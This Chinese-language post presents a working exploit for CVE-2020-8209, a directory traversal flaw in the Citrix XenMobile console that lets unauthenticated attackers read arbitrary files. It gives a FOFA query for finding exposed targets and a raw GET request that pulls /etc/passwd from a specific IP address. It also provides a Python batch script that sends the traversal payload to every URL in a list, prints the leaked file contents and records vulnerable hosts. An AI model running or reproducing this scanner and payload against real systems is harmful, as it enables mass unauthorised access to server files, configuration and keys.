利用此漏洞,可以读取Web服务器根目录之外的任意文件,包括配置文件和敏感的加密密钥。剥削不需要授权。在文件help-sb-download.jsp中标识了易受攻击的代码:
fofa:
app="XenMobile-控制台"
PoC:
GET /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd HTTP/1.1
Host: 88.212.26.164
批量检测脚本:
CVE-2020-8209-Multiple.py:
#!/usr/bin/env python
# coding:utf-8
# author:B1anda0
import requests,sys,colorama
from colorama import *
init(autoreset=True)
banner='''\033[1;33;40m
_______ ________ ___ ___ ___ ___ ___ ___ ___ ___
/ ____\ \ / / ____| |__ \ / _ \__ \ / _ \ / _ \__ \ / _ \ / _ \
| | \ \ / /| |__ ______ ) | | | | ) | | | |_____| (_) | ) | | | | (_) |
| | \ \/ / | __|______/ /| | | |/ /| | | |______> _ < / /| | | |\__, |
| |____ \ / | |____ / /_| |_| / /_| |_| | | (_) / /_| |_| | / /
\_____| \/ |______| |____|\___/____|\___/ \___/____|\___/ /_/
'''
def XenMobile():
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"}
payload= '/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd'
poc=urls+payload
try:
requests.packages.urllib3.disable_warnings()#解决InsecureRequestWarning警告
response=requests.get(poc,headers=headers,timeout=10,verify=False)
if response.status_code==200 and "root" in response.content:
print(u'\033[1;31;40m[+]{} is citrix xenmobile directory traversal vulnerability'.format(urls))
print(response.content)
#将漏洞地址输出在Vul.txt中
f=open('./vul.txt','a')
f.write(urls)
f.write('\n')
else:
print('\033[1;32;40m[-]{} None'.format(urls))
except:
print('{} request timeout'.format(urls))
if __name__ == '__main__':
print (banner)
if len(sys.argv)!=2:
print('Example:python CVE-2020-8209.py url.txt')
else:
file = open(sys.argv[1])
for url in file.readlines():
urls=url.strip()
if urls[-1]=='/':
urls=urls[:-1]
XenMobile()
print ('Check Over')使用方法:Python CVE-2020-8209-Multiple.py url.txt
ref;